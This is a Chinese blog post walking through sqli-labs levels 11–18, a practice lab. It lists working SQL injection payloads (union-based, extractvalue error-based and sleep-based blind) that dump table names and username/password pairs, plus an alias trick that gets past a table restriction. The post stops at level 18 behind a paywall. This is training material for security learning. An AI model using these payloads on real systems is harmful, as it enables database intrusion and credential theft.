Sql-lab全解_sqllab

最新推荐文章于 2024-05-26 21:07:50 发布
最新推荐文章于 2024-05-26 21:07:50 发布
阅读量720 收藏 25
点赞数 28
分类专栏: 2024年程序员学习 文章标签: sql 数据库 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77033340/article/details/137660416
版权

这里推荐在password注入,因为会判断密码和账户的正确性,正确才会回显,如果这里在username注入则会比较麻烦

经过测试这里

回显位为2位

-1’ union select database(),group_concat(table_name) from information_schema.tables where table_schema=database()#

得到数据库名称,和当前表名称

-1’ union select database(),group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘users’#

得到表列

-1’ union select database(),group_concat(username,password) from security.users#

得到数据

第十二题

这里也是直接看源码进行分析

改变闭合方式其他的和第十一题没有区别

-1") union select database(),group_concat(username,password) from security.users#

第十三题

-1’) union select database(),group_concat(username,password) from security.users#

发现没有回显了

这里尝试报错注入

-1’) and extractvalue(1,concat(0x7e,(select group_concat(username,password) from security.users)))#

第十四题

同样没有回显,使用报错注入

-1" and extractvalue(1,concat(0x7e,(select group_concat(username,password) from security.users)))#

第十五题

这里和上面的有些不同,这里报错没有回显了,所以在这里采用post盲注

admin’ and if(ascii(concat(database()))>0,sleep(5),sleep(10))#

存在注入后续可以使用sqlmap辅助注入,盲注工作量太大了

第十六题

这里测试也是没有回显使用盲注,查看源码发现闭合方式为")

使用语句admin“) and if(ascii(concat(database()))>0,sleep(5),sleep(10))#

第十七题

观察源码发现uname被过滤所以不可能在这里注入

这里uname被过滤了直接在passwd注入

这里看到注入语句前面是updata采用报错注入

’ or extractvalue(1,concat(0x7e,(database())))#

最后爆出数据表的时候会报一个错误

这里是数据库做了一个限制不允许读users表可以使用别名绕过

’ or extractvalue(1,(select concat(0x7e,(select group_concat(username,password) from (select username,password from users)a))))#

将users表中的数据username和password存到一个别名为a的表中,这个时候就绕过了

第十八题

这里观察源码发现username和passowrd都被过滤但是这里有两个uagent和ip没有被过滤,和上一题一样使用报错注

最低0.47元/天 解锁文章
蓉城垡
关注
  • 28
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql-labs
m0_74606212的博客
03-10 401
sql-labs
网络安全05-sql-labs靶场全网最详细总结
m0_68976043的博客
02-10 2736
sql注入有很多方式其中我们最详细见到的就是:基于错误的注入(Error-based Injection): 攻击者利用应用程序返回的错误消息来识别漏洞。通过在 SQL 查询中插入恶意代码,攻击者可以引发数据库错误,然后根据错误消息获得关于数据库结构和内容的信息。基于联合查询的注入(Union-based Injection): 攻击者利用 UNION 查询将恶意结果合并到应用程序的原始查询结果中。通过在 SQL 查询中插入 UNION 子句,攻击者可以将额外的查询结果合并到原始结果中,从而泄露敏感信息。基
sql-labs靶场环境搭建(手把手保姆级教学)
最新发布
焦虑的焦虑
05-26 1936
sql-labs靶场搭建(保姆级手把手教学)你来你也行噢!
sql-labs学习
weixin_64286326的博客
02-08 2204
前言: 年前学习过sql的知识,现在忘得差不多了,趁这个机会赶紧在复习一下。 1 万能密码 在mysql里面 -- # 他们都代表注释 我们在登陆框内输入账号密码,服务器会在数据库内进行查询,大概是这样 select * FROM user WHERE username= '111' AND password= '222' 假如我们在登录框内的username填写 1' or 1=1# 效果是这样 SELECT * FROM user WHERE username= '1'
sqllabs详解与知识点汇总(内含代码审计)
Samblue_M的博客
02-03 5004
sqllabs闯关记录 关于注释符的详解 SQL注入注释符(#、-- 、/**/)使用条件及其他注释方式的探索 - impulse- - 博客园 (cnblogs.com) HTTP请求方法------GET 对比 POST HTTP 方法:GET 对比 POST | 菜鸟教程 (runoob.com) 来自知乎的绕过 SQL注入:各种绕过检测的姿势 - 知乎 (zhihu.com) Less-1~4 @读题-------------get方式提交 @Error based—报错注入 @Single quo
web安全sql注入篇——sqls-labs的安装和注入
m0_68167825的博客
06-10 1912
我们在刚学习 SQL 注入的时候,往往都需要一个能 SQL 注入的网站进行 SQL 注入学习。如果直接去网上寻找存在 SQL 注入的网站对新手来说有些难度,因此我们一般都是在本地搭建一个能 SQL 注入测试的网站。这里就来讲解一下 SQLi-Labs 的下载,安装,搭建教程。注意: mysql 版本一定要设置成 php5 以上,php5 以上才有 information_schema 库。SQLi-Labs 是一个专业的 SQL 注入练习平台,它适用于 GET 和 POST 等多场景的注入。使用 phpSt
sql-labs靶场环境搭建(手把手教你如何搭建)
热门推荐
Joker_Dgh的博客
04-02 3万+
sqli-labs介绍 SQLI-LAB下载地址: https://github.com/Audi-1/sqli-labs WEB环境搭建: 在安装靶场之前,我们还需要搭建web运行环境: 这里直接使用phpstudy进行搭建,phpStudy是一个PHP调试环境的程序集成包。安装后一键启动即可运行web环境:Windows版phpstudy下载 - 小皮面板(phpstudy) (xp.cn) 下载后安装即可。 Sql-labs靶场环境搭建 安装好phpst..
sql-labs(1-8关)
2302_80935968的博客
04-17 2131
该语句的意思是查询information_schema数据库下的tables表里面且table_schema字段内容是security的所有table_name的内容。id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 0,1),2,1))=100 --+表示所有字段对应的表名。
flink-sql-connector-hive-3.1.2_2.12-1.12.0.jar flink整合hive3资源包
07-06
由于jar包的下载速度很慢,我想也有很多下载慢的同学,分享下
flink-sql-connector-kafka_2.11-1.12.0.jar
03-30
flink-sql-connector-kafka_2.11-1.12.0
flink-sql-connector-hive-3.1.2_2.11-1.11.6.jar 已经解决guava冲突亲测可以
03-19
flink-sql-connector-hive-3.1.2_2.11-1.11.6.jar 已经解决guava冲突亲测可以
SQLI-LABS环境搭建
12-12
SQLI-LABS环境搭建,里面包含PhpStudy2018和sqli-labs-ma
flink-sql-connector-kafka_2.11-1.11.2.jar
03-12
flink-sql-connector-kafka_2.11-1.11.2.jar
flink-sql-connector-hive-2.3.6_2.11-1.11.0.jar
11-16
flink-sql-connector-hive-2.3.6_2.11-1.11.0.jar
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析
Jay17的博客
08-03 3万+
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析 详细,超级详细
sqli-labs 通关笔记详解 Less1 - Less10
HAKUNAMATATATTA的博客
12-18 2766
sqli-labs靶场之前建议补一下基础。
sql-labs(1~4)
qq_53142368的博客
03-13 2689
学习目标: sql-labs 靶场基础练习 学习内容: sql-labs 靶场1~4关 学习时间: 2021年3月7日~2021年3月13日 学习产出: 前言 说出来满满都是泪呀 /(ㄒoㄒ)/~~ 我的靶场一直搭建不好,tmd,PHP study下载好了,并且在db-creds.inc里的用户地址也改为了本地127.0.0.1(localhost) 但是在打开靶场,发现打不开题(知道有多难受么)知道最近才问学长,同学,才发现是自己的PHP study版本太高了,这里就又出现一个问题,哎,我下载了好几个版本
Sqli-labs 1-65关的解题记录(做题思路与简要)
CaesarQu的博客
08-13 3593
Sqli-labs的详细解题记录 Less-1: 进入关卡内先判断是否存在注入情况,先输入?id =1 and 1=1,发现没有变化,换成and 1=2,依旧没有变化,考虑是为字符型而非整形。用 ’ 进行测试,发现页面报错,出现如下显示,证明可以进行SQL注入。 发现为字符型的后先在后面加一个注释符 --+ 可以发现正常返回数据。 此处可以用 order by 对前面的数据进行排列,先进行试数,发现只有三组数据,'order by 4–+就会超出 然后就可以进行union联合注入 然后就可以获取所有
sqli-labs解题记录
AleisurE的博客
04-03 403
sqli-labs解题记录 参考:sql注入天书 sqli-labs解题大法 说明:这是刚学web渗透的小白,这份解题记录,是在我浅薄的知识基础上进行解题的,其中记录了我解题遇到的问题,想法与步骤。 但是如果您是来学习sql注入的,网上有很多优秀详细的题解,比如上面两篇参考,您一定会学到更多 less1 前几关都比较简单,常规注就行了。 ?id=1 有回显 ?id=1=2 有回显 说明是字符型注入 ?id=’ or 1=1 --+ 闭合单引号 有回显 此时的sql语句是:SELECT * F
tomcat sql-lab
07-27
对于Tomcat和SQL-Lab的问题,我可以为您提供一些基本信息。 Tomcat是一个开源的Java Servlet容器,用于在服务器上运行Java Web应用程序。它是Apache软件基金会的一个项目,提供了一个可靠和高性能的Web服务器环境。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值